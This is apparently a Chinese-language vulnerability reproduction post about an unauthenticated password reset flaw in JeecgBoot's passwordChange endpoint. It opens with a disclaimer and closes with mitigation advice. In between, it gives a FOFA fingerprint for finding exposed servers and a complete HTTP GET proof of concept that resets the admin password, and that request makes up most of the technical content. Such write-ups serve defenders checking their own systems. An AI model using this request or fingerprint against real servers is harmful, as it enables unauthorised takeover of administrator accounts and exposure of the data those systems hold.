導(dǎo)言

文章僅用作網(wǎng)絡(luò)安全人員對自己網(wǎng)站、服務(wù)器等進(jìn)行自查檢測，不可用于其他用途，未經(jīng)授權(quán)請勿利用文章中的技術(shù)資料對任何計(jì)算機(jī)系統(tǒng)進(jìn)行入侵操作，由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失，均由使用者本人負(fù)責(zé)，作者不為此承擔(dān)任何責(zé)任。切勿用于網(wǎng)絡(luò)攻擊！！！

PART 

漏洞描述

JeecgBoot框架passwordChange接口存在任意用戶密碼重置漏洞，未經(jīng)身份驗(yàn)證的遠(yuǎn)程攻擊者可以利用此漏洞重置管理員賬戶密碼，從而接管系統(tǒng)后臺(tái)，造成信息泄露，導(dǎo)致系統(tǒng)處于極不安全的狀態(tài)。

漏洞復(fù)現(xiàn)

漏洞URL：/novat-boot/sys/user/passwordChange

漏洞參數(shù)：username、password

F O F A ：body="/sys/common/pdf/pdfPreviewIframe"

漏洞詳情：

1、打開自己的服務(wù)

2、使用以下POC進(jìn)行驗(yàn)證

GET /novat-boot/sys/user/passwordChange?username=admin&password=admin&smscode=&phone= HTTP/1.1

Host: 127.0.0.1:8088

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

3、漏洞利用成功

修復(fù)建議

官網(wǎng)目前未發(fā)布補(bǔ)丁，建議禁止對互聯(lián)網(wǎng)開放，或采用白名單方式限制訪問。

原文來源：https://mp.weixin.qq.com/s/G5DiGrVbYKmftBLJ06NmQg